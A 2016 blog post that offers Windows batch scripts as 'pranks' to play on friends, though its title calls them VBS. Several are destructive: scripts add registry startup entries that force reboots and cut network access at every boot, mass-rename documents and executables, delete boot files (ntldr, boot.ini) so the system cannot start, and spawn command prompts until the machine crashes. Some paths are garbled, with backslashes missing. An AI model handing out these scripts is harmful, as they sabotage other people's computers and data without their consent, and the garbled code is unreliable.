Sunday 27 November 2016

Prank your friends by using vbs (visual basic script)

Hello friends,

                    In this blog, use can see lots of vbs (visual basic script) code under the category of  computer tricks . By this,You can learn about vbs and also you can prank your friends . 

Note : 
  •  It's better to code in notepad . 
  •  While saving, select an option as All files in Save As type

Warning :
 Be careful, while playing with these codes.It may cause serious damage.There is no responsibility to  author for any damage.

Be a daily visitor & stay updated !!

Crash

System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED *****
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save it as learnfromzero.bat

Disable Internet

Disable internet permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save it as Hinternet.bat

Disco !!!

@echo off
:S
echo                     #
echo                   #   #
echo                 #       #
echo               #           #
echo             #   DISCO!  #
echo              #             #
echo               #          #
echo                 #      #
echo                   #  #
echo                    #
color 12
color 23
color 45
color 67
color 89
color 91
color 37
color 42
color 43
color 51
color 15
color 42
color 2
color 3
color 34
goto s



save it as learnfromzero.bat

Cmd Calculator

 @echo off
title Calc
:loop
cls
set /p first=First number: 
echo.
echo Mark ( + - * / )
set /p mark=Mark: 
echo.
set /p second=Second number: 
set /a final=%first%%mark%%second%
echo.
echo %final%
pause
goto loop



Save it as learnfromzero.bat

Shutdown your computer forever

!!! WARNING !!! It shuts the computer off once, and deletes the files needed to reboot and restart !!!

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini 
Save it as Learnfromzero.bat


REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Start website

Description: This will allow you to start any program just by opening this file including the task manager. 



1. Go into Notepad and type: 

start "www.examplewebsite.com" (without quotes and with a real domain name.)

2.
 Save it as start.bat 


3. Test it out to see if it gets you to the website.

Fake Area

Description: Shows a fake username and password entrance area then deletes it self. 

1. Go into notepad and type: 

@echo off
 
echo If the proper username and password is not entered all files will be deleted by this virus.
 
echo Good Luck
 
set/p\/name=username:
 
set/p\/password=password:
 
echo haha you got the username and password wrong
 
pause
 
echo Files are being deleted
 
pause
 
dir/s
 
del "c:up.bat"
 


3. Save it as up.bat (MUST BE saved as 'up.bat', otherwise the program won't work!) 

4. If you want, test it. =)

Shut Down

Description: This makes your friend think that his/her computer has a virus then their computer shuts down. 


1. Go to notepad and type:
 
@echo off 
:A
 
cls
 
echo Do you wanna crash your computer? (y/n)
 
pause
 
echo Are you sure? (y/n)
 
pause
 
echo your computer will crash when the time reaches zero.
 
pause
 
msg * Your computer will crash in...
 
msg * 5
 
msg * 4
 
msg * 3
 
msg * 2
 
msg * 1
 
msg * Good-Bye
 
msg * You have been pwned! :)
 
shutdown -s -t 00
 

2.
 Save it as Learnfromzero.bat


3. If you want, test it out. ;)

Command prompts unlimited

This prank will open and unlimited amount of command prompts until the computer crashes or you manually crash it. 

1. Go into Notepad 
2. Type
 start virus.bat 

3. Save it as virus.bat
4. Test it if you want. ;)             

  (This program can't damage your computer)

Delete

This prank will make your friends think that all of their files are being deleted and then at the end the file deletes itself so it is untraceable. 

@echo off 
echo do you want to delete all of your computer data? (y/n) 
pause >nul
echo Do not exit out of the screen or all computer data will be deleted.
 
ping localhost -n 2 > nul
 
echo Are you sure you want to delete all computer data? (y/n)
 
pause >nul
 
echo deleting all data...
 
echo.
 
echo.
 
pause localhost -n 2 > nul
 
dir /s
 
echo.
 
echo.
 
ping localhost -n 2 > nul
 
cls
 
echo error.. error.. Not all data deleted, are you sure you wish to stop? (y/n)
 
pause
 
echo.
 
echo.
 
ping localhost -n 1 > nul
 
cls
 
dir /s
 
echo.
 
echo.
 
ping localhost -n 2 >nul
 
cls
 
echo all data has been deleted..
 
pause
 
del "c:delete.bat"


Save it as Delete.bat